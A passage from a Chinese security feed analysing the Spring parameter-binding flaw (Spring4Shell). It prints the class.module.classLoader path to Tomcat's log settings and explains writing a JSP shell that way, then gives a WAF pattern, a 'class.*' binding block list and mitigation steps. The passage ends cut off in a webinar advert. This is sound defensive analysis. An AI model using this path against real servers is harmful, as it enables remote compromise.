Roman&#34;, serif;font-size: 16px;text-align: left;background-color: rgb(255, 255, 255);">SpringMVC参数绑定入门就这一篇</span> <a href="https://segmentfault.com/a/1190000022586808 " target="_blank">https://segmentfault.com/a/1190000022586808 </a></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">该漏洞的本质类似于php的变量覆盖漏洞，exp利用的话，恰好覆盖到tomcat的配置，并修改tomcat的日志位置到根目录，修改日志的后缀为jsp。但是这里叫SpringMVC的参数绑定。如图</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD6ibA2Tddb1EoHhFLLyxeP3K81tyIcqco8nZ6MW2Ih0CbAhCyzXgvt1kiboNpdC59g9ZmI4x5dqfwc/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><a href="http://localhost:8080/web_war/ParameterBind/test2?name=aa" target="_blank">http://localhost:8080/web_war/ParameterBind/test2?name=aa</a><br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">如果我们把name这个变量给User这个对象，User对象的代码如下</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD6ibA2Tddb1EoHhFLLyxeP3K81tyIcqco8nZ6MW2Ih0CbAhCyzXgvt1kiboNpdC59g9ZmI4x5dqfwc/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="color: #c678dd;line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">class</span> <span style="color: #e6c07b;line-height: 26px;">User</span> </span>{<br/>    <span style="color: #c678dd;line-height: 26px;">private</span> String name;<br/>    <span style="color: #c678dd;line-height: 26px;">private</span> Integer age;<br/>    <br/>    <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">public</span> String <span style="color: #61aeee;line-height: 26px;">getName</span><span style="line-height: 26px;">()</span> </span>{<br/>        <span style="color: #c678dd;line-height: 26px;">return</span> name;<br/>    }<br/>    <br/>    <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">public</span> <span style="color: #c678dd;line-height: 26px;">void</span> <span style="color: #61aeee;line-height: 26px;">setName</span><span style="line-height: 26px;">(String name)</span> </span>{<br/>        <span style="color: #c678dd;line-height: 26px;">this</span>.name = name;<br/>    }<br/>    <br/>    <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">public</span> Integer <span style="color: #61aeee;line-height: 26px;">getAge</span><span style="line-height: 26px;">()</span> </span>{<br/>        <span style="color: #c678dd;line-height: 26px;">return</span> age;<br/>    }<br/>    <br/>    <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">public</span> <span style="color: #c678dd;line-height: 26px;">void</span> <span style="color: #61aeee;line-height: 26px;">setAge</span><span style="line-height: 26px;">(Integer age)</span> </span>{<br/>        <span style="color: #c678dd;line-height: 26px;">this</span>.age = age;<br/>    }<br/>}<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">正常思维是从Http get参数中获取name的值 实例化对象，然后赋值，但是spring框架简化这个过程，所以就叫参数绑定。spring代码如下</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD6ibA2Tddb1EoHhFLLyxeP3K81tyIcqco8nZ6MW2Ih0CbAhCyzXgvt1kiboNpdC59g9ZmI4x5dqfwc/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">    <span style="color: #61aeee;line-height: 26px;">@ResponseBody</span><br/>    <span style="color: #61aeee;line-height: 26px;">@RequestMapping</span>(<span style="color: #98c379;line-height: 26px;">&#34;/test2&#34;</span>)<br/>    <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">public</span> String <span style="color: #61aeee;line-height: 26px;">test2</span><span style="line-height: 26px;">(User u)</span></span>{<br/>        System.out.println(u.toString());<br/>        <span style="color: #c678dd;line-height: 26px;">return</span> <span style="color: #98c379;line-height: 26px;">&#34;test2&#34;</span>;<br/>    }<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">也就是说spring从http请求中自动解析变量，并给user对象。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">可以想象，该项技术的实现必然有大量的反射技术。下面我们来分析一下实现过程。</p><h1 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 24px;"><span style="display: none;"></span><span>参数绑定实现过程</span><span></span></h1><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>org.springframework.beans.AbstractPropertyAccessor#setPropertyValues(org.springframework.beans.PropertyValues, boolean, boolean)</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在这里开始，将http请求中每一个kv对，设置到bean对象上，</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD6ibA2Tddb1EoHhFLLyxeP3K81tyIcqco8nZ6MW2Ih0CbAhCyzXgvt1kiboNpdC59g9ZmI4x5dqfwc/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"> <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">public</span> <span style="color: #c678dd;line-height: 26px;">void</span> <span style="color: #61aeee;line-height: 26px;">setPropertyValues</span><span style="line-height: 26px;">(PropertyValues pvs, <span style="color: #c678dd;line-height: 26px;">boolean</span> ignoreUnknown, <span style="color: #c678dd;line-height: 26px;">boolean</span> ignoreInvalid)</span><br/>   <span style="color: #c678dd;line-height: 26px;">throws</span> BeansException </span>{<br/>  List&lt;PropertyAccessException&gt; propertyAccessExceptions = <span style="color: #c678dd;line-height: 26px;">null</span>;<br/>  List&lt;PropertyValue&gt; propertyValues = (pvs <span style="color: #c678dd;line-height: 26px;">instanceof</span> MutablePropertyValues ?<br/>    ((MutablePropertyValues) pvs).getPropertyValueList() : Arrays.asList(pvs.getPropertyValues()));<br/>  <span style="color: #c678dd;line-height: 26px;">for</span> (PropertyValue pv : propertyValues) {<br/>    <span style="color: #5c6370;font-style: italic;line-height: 26px;">// This method may throw any BeansException, which won&#39;t be caught</span><br/>    <span style="color: #5c6370;font-style: italic;line-height: 26px;">// here, if there is a critical failure such as no matching field.</span><br/>    <span style="color: #5c6370;font-style: italic;line-height: 26px;">// We can attempt to deal only with less serious exceptions.</span><br/>    setPropertyValue(pv);<br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-ratio="0.5184331797235023" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1736" src="https://wechat2rss.xlab.app/img-proxy/?k=23aa29e1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdF3so8iad5x05FMpD59slrdL0WfaIaRVD5lM4hTzpDtYhESicG5paI5tmJVBk8VVyvvEicfT8mViakO4Q%2F640%3Fwx_fmt%3Dpng"/><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">image.png</figcaption></figure><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>org.springframework.beans.BeanWrapperImpl#setPropertyValue(org.springframework.beans.PropertyValue)</span><span></span></h2><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD6ibA2Tddb1EoHhFLLyxeP3K81tyIcqco8nZ6MW2Ih0CbAhCyzXgvt1kiboNpdC59g9ZmI4x5dqfwc/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"> <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">public</span> <span style="color: #c678dd;line-height: 26px;">void</span> <span style="color: #61aeee;line-height: 26px;">setPropertyValue</span><span style="line-height: 26px;">(PropertyValue pv)</span> <span style="color: #c678dd;line-height: 26px;">throws</span> BeansException </span>{<br/>  PropertyTokenHolder tokens = (PropertyTokenHolder) pv.resolvedTokens;<br/>  <span style="color: #c678dd;line-height: 26px;">if</span> (tokens == <span style="color: #c678dd;line-height: 26px;">null</span>) {<br/>   String propertyName = pv.getName();<br/>   BeanWrapperImpl nestedBw;<br/>   <span style="color: #c678dd;line-height: 26px;">try</span> {<br/>    nestedBw = getBeanWrapperForPropertyPath(propertyName);<br/>   }<br/>   <span style="color: #c678dd;line-height: 26px;">catch</span> (NotReadablePropertyException ex) {<br/>    <span style="color: #c678dd;line-height: 26px;">throw</span> <span style="color: #c678dd;line-height: 26px;">new</span> NotWritablePropertyException(getRootClass(), <span style="color: #c678dd;line-height: 26px;">this</span>.nestedPath + propertyName,<br/>      <span style="color: #98c379;line-height: 26px;">&#34;Nested property in path &#39;&#34;</span> + propertyName + <span style="color: #98c379;line-height: 26px;">&#34;&#39; does not exist&#34;</span>, ex);<br/>   }<br/>   tokens = getPropertyNameTokens(getFinalPath(nestedBw, propertyName));<br/>   <span style="color: #c678dd;line-height: 26px;">if</span> (nestedBw == <span style="color: #c678dd;line-height: 26px;">this</span>) {<br/>    pv.getOriginalPropertyValue().resolvedTokens = tokens;<br/>   }<br/>   nestedBw.setPropertyValue(tokens, pv);<br/>  }<br/>  <span style="color: #c678dd;line-height: 26px;">else</span> {<br/>   setPropertyValue(tokens, pv);<br/>  }<br/> }<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在getBeanWrapperForPropertyPath中，开始解析http中的key，<img class="rich_pages wxw-img" data-ratio="0.16809116809116809" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="702" src="https://wechat2rss.xlab.app/img-proxy/?k=af08a06a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdF3so8iad5x05FMpD59slrdLIVY3QiahYk2zRvTMrGjbkmUg14rKqb2gar00MiaLlCqayxlrq2BpXMmw%2F640%3Fwx_fmt%3Dpng"/>也就是类似于这类请求<img class="rich_pages wxw-img" data-ratio="0.09859154929577464" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="710" src="https://wechat2rss.xlab.app/img-proxy/?k=a7045ed6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdF3so8iad5x05FMpD59slrdLp6hUCFRs8cELR9x2jYb4Amn2IeibQEn5WtibPiaZuovEAYOXEsqfic5Uxg%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">下一个调用上一个的get + 属性名。在这里就是调用class的setModel方法，参数为aa，字符串类型。也就是设置class的Model值为aa。那么问题来了，class是谁？所以对于参数绑定来讲，就是你的那个bean对象的属性。也就是系统默认会有name和age。但是偏偏多了一个class，指向bean对象的类的引用。导致通过这个class引用，修改非bean对象的属性的值。也就造成了变量覆盖。<img class="rich_pages wxw-img" data-ratio="0.33631713554987214" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1564" src="https://wechat2rss.xlab.app/img-proxy/?k=bf925407&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdF3so8iad5x05FMpD59slrdLsP4f7G1BjVPbL6pxZDp6oO5A2acAaO0oAkHycDPxxfqia67w1RqRTdw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><strong>但是通过参数绑定去修改的对象有限，必须能通过class为起始对象，并且可以通过无参get方法获取到引用，必须有get/set方法。修改的值必须为字符串。</strong></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><strong><br/></strong></p><p style="min-height: 24px;"><span>每个bean对象的Propery的cache，在初始化的时候由下面的方法调用生成。</span></p><p style="min-height: 24px;"><span>org.springframework.beans.CachedIntrospectionResults#CachedIntrospectionResults</span></p><p style="min-height: 24px;"><img class="rich_pages wxw-img" data-ratio="0.3266509433962264" width="848" data-type="png" data-w="1696" src="https://wechat2rss.xlab.app/img-proxy/?k=59f315a3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdF3so8iad5x05FMpD59slrdLlIcGyibpiccoDVEic221hwiayfVWcubh0ibTVg0m2PyHKgCZxLicg6LWiaNCg%2F640%3Fwx_fmt%3Dpng"/></p><p style="min-height: 24px;"><span>这也就是为什么很多exp在Java8不可以的原因。</span></p><p>当初 Spring 修复了 CVE-2010-1622，修复<span style="letter-spacing: 0px;">方式是拦截 Class.getClassLoader的访问，也就是如上图，但是</span><span style="letter-spacing: 0px;">Java9新增了可以通过Class.getModule方法。</span><span style="letter-spacing: 0px;">通过getModule的结果可以调用getClassloader的方式继续访问更多对象的属性。</span></p><p style="min-height: 24px;"><br/></p><p style="min-height: 24px;"><img data-ratio="0.581081081081081" width="222" data-type="png" data-w="444" src="https://wechat2rss.xlab.app/img-proxy/?k=6e6ff9d4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdF3so8iad5x05FMpD59slrdLrxZuyUVYFN1U6HjtSQfNjDDEIpKLiaNnn0oOqdqmBy44k3OEas4OVPQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="min-height: 24px;"><a href="https://docs.oracle.com/javase/9/docs/api/java/lang/Module.html" target="_blank">https://docs.oracle.com/javase/9/docs/api/java/lang/Module.html</a></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><br/></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">org.springframework.beans.BeanWrapperImpl#setPropertyValue(org.springframework.beans.BeanWrapperImpl.PropertyTokenHolder, org.springframework.beans.PropertyValue)</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">调用set+属性名的方法，设置bean的值<img class="rich_pages wxw-img" data-ratio="0.5886010362694301" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1930" src="https://wechat2rss.xlab.app/img-proxy/?k=91ecb28d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdF3so8iad5x05FMpD59slrdLzQcr11lR3JMiaNZD11cMIicMAAgDoMqsxRQrEnEOjBzgabZ4NmnRvFAw%2F640%3Fwx_fmt%3Dpng"/></p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">class</span>.<span style="color: #e6c07b;line-height: 26px;">module</span>.<span style="color: #e6c07b;line-height: 26px;">classLoader</span>.<span style="color: #e6c07b;line-height: 26px;">resources</span>.<span style="color: #e6c07b;line-height: 26px;">context</span>.<span style="color: #e6c07b;line-height: 26px;">parent</span>.<span style="color: #e6c07b;line-height: 26px;">pipeline</span>.<span style="color: #e6c07b;line-height: 26px;">first</span>.<span style="color: #e6c07b;line-height: 26px;">prefix</span></span><span style="color: black;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0px;"></span><span style="color: black;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0px;">我们可以发现，可以直接从class中获取到tomcat的context，在context中存储很多东西，例如修改日志路径属性等等，修改的值为字符串，完美符合本次漏洞的需求。</span></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">但是weblogic的context会不会可以通过class获取到引用很难说。所以影响的局限性不限于tomcat这一种中间件。</p><h1 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 24px;"><span style="display: none;"></span><span>自查方案</span><span></span></h1><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">目前exp具体影响不明，因为一个完美的武器级exp需要满足</p><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><strong style="color: black;">必须要能通过class为起始对象获取到引用（深度搜索的起点为class），并且还要有无参get方法</strong></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><strong style="color: black;">必须有get/set方法，符合java bean规范。</strong></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><strong style="color: black;">set方法的值必须为字符串</strong></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><strong style="color: black;">该controller必须存在spring的参数绑定。</strong></section></li></ol><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">目前只流传tomcat的exp，不排除其他中间件的exp，不排除dos等其他漏洞的exp。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>waf规则</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">现在我们知道为什么java9可以而java8不可以的原因，所以我们可以断定<code style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">class.module</code>这串字符串一定出现在exp的请求中，可以重点防御这串字符串</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>甲方自查手册</span><span></span></h2><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">确定线上业务中的controller是否使用了spring的参数绑定技术，如果使用则按照下一条继续排查</p></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">jdk版本是否为jdk9以上，jdk8以下天然防御</p></section></li></ol><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">因为该漏洞的本质是变量覆盖漏洞，但是利用手法通过覆盖tomcat的配置修改tomcat的日志位置到根目录，修改日志的后缀为jsp去getshell。</p><ol start="3" data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">如果防止getshell，则重点排查中间件是否为tomcat。</p></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">非tomcat中间件目前来说不一定会被getshell，但是存在被该漏洞影响到线上业务的风险（任意变量覆盖到中间件的其他变量配置，导致dos等其他场景），建议停机修改应用，修复方式如下</p></section></li></ol><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">注意，目前只有通过应用下线重发布的方式打补丁，并且非spring官方推荐修复，存在一定几率的翻车风险。同时按以下两个步骤进行漏涧的临时修复:</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">1.在应用中全局搜索@InitBinder注解，看看方法体内是否调用dataBinder.setDisallowedFields方法，如果发现此代码片段的引入，则在原来的黑名单中，添加{&#34;class.<em>&#34;,&#34;Class. <em>&#34;,&#34;</em>. class.</em>&#34;, &#34;<em>.Class.</em>&#34;}。(注:如果此代码片段使用较多,需要每个地方都追加)</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在应用系统的项目包下新建以下全局类，并保证这个类被Spring 加载到(推荐在Controller 所在的包中添加).完成类添加后，需对项目进行重新编译打包和功能验证测试。并重新发布项目。</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMD6ibA2Tddb1EoHhFLLyxeP3K81tyIcqco8nZ6MW2Ih0CbAhCyzXgvt1kiboNpdC59g9ZmI4x5dqfwc/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">import org.springframework.core.annotation.Order;<br/>import org.springframework.web.bind.WebDataBinder;<br/>import org.springframework.web.bind.annotation.ControllerAdvice;<br/>import org.springframework.web.bind.annotation.InitBinder;<br/>@ControllerAdvice<br/>@Order(10000)<br/>public class a{<br/>@InitBinder<br/>public void setAllowedFields(WebDataBinder dataBinder) {<br/>String[] abd = new String[]{<span style="color: #98c379;line-height: 26px;">&#34;class.*&#34;</span>, <span style="color: #98c379;line-height: 26px;">&#34;Class.*&#34;</span>, <span style="color: #98c379;line-height: 26px;">&#34;*.class.*&#34;</span>, <span style="color: #98c379;line-height: 26px;">&#34;*.Class.*&#34;</span>};<br/>dataBinder.setDisallowedFields(abd);<br/>}<br/>}<br/></code></pre></section><p><br/></p>



<p><a href="2247485661">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=b680aeef&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUzNTEyMTE0Mw%3D%3D%26mid%3D2247485661%26idx%3D1%26sn%3D0c9683ecbd60effdde67bc8d724f04da%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 31 Mar 2022 16:37:00 +0800</pubDate>
    </item>
    <item>
      <title>【直播预告】“瞒天过海”攻防演练之欺骗防御</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485638&amp;idx=1&amp;sn=25dff54e3ec2d67242cbf2eaba8ea567</link>
      <description>免费抽600元京东卡、笔记本电脑支架！</description>
      <content:encoded><![CDATA[<p>
<span></span> <span>2022-03-21 10:18</span> <span style="display: inline-block;"></span>
</p>

<p>免费抽600元京东卡、笔记本电脑支架！</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=76bd8c0d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FZN7wPwxfasxxQPYD8fCZZI2QNI9jrFiajYPraFweoj27f8HJDm4cIbIKaoALsU3cKqBZpGOyGqE0LN2WjphvXsQ%2F0%3Fwx_fmt%3Djpeg%26amp%3Brandom%3D0.7964350381994862"/>
</p>


<p style="margin-left: 8px;margin-right: 8px;line-height: 1.75em;" data-mpa-powered-by="yiban.io"><span style="font-size: 15px;letter-spacing: 1px;">从古至今欺骗战术在各种战争中就应用广泛，孙子兵法有云 “兵者，诡道也”就是通过千变万化的欺骗战术迷惑敌人。对于模拟真实网络战争的攻防演练来说，<strong>欺骗防御可以说是必不可少的战术手段。</strong></span></p><p style="margin-left: 8px;margin-right: 8px;line-height: 1.75em;"><br/></p><p style="margin-left: 8px;margin-right: 8px;line-height: 1.75em;"><span style="font-size: 15px;letter-spacing: 1px;">如今网络攻防实战演练逐渐常态化，面对攻防不对等局面企业很多方面的安全问题被直接暴露。在攻防实战的过程中，攻击方钓鱼、Nday、0day等策略层出不穷，相比于被动防御成本高且效果难以保证，不如开拓新局面主动设置陷阱让攻击者落入圈套，通过影响攻击者的行为使攻防演练局面更有利于防御方。</span></p><p style="margin-left: 8px;margin-right: 8px;line-height: 1.75em;"><br/></p><section style="margin-left: 8px;margin-right: 8px;line-height: 1.75em;"><span style="font-size: 15px;letter-spacing: 1px;">欺骗防御作为一种主动防御手段,可以有效提升对抗网络入侵能力。在网络攻击和防御策略不断发展的今天，如何在攻防演练中部署欺骗防御体系？如何才能最大限度地发挥欺骗技术的能力呢？</span></section><p><br/></p><section style="margin-left: 8px;margin-right: 8px;"><span style="letter-spacing: 1px;color: rgb(0, 128, 255);"><strong><span style="font-size: 15px;">3月23日（周三）20：00</span></strong></span><span style="letter-spacing: 1px;font-size: 15px;">，知道创宇特别</span><span style="font-size: 15px;letter-spacing: 1px;color: rgb(0, 128, 255);"><strong>免费</strong></span><span style="letter-spacing: 1px;font-size: 15px;">推出</span><span style="font-size: 15px;letter-spacing: 1px;color: rgb(0, 128, 255);"><strong>《攻防演练之欺骗防御》</strong></span><span style="letter-spacing: 1px;font-size: 15px;">线上直播。</span></section><section style="outline: 0px;max-width: 100%;caret-color: rgb(51, 51, 51);font-size: 14.875px;text-size-adjust: auto;font-family: -apple-system, system-ui, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);line-height: 26.0312px;visibility: visible;margin-left: 8px;margin-right: 8px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="outline: 0px;max-width: 100%;visibility: visible;line-height: 26.0312px;font-size: 15px;letter-spacing: 1px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><br/></span></section><section style="margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;letter-spacing: 1px;">直播主要围绕以下内容展开</span></section><section powered-by="xiumi.us" mp-original-font-size="14" mp-original-line-height="22" style="outline: 0px;max-width: 100%;caret-color: rgb(51, 51, 51);text-size-adjust: auto;font-family: -apple-system, system-ui, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 12.25px;letter-spacing: 1px;background-color: rgb(255, 255, 255);visibility: visible;line-height: 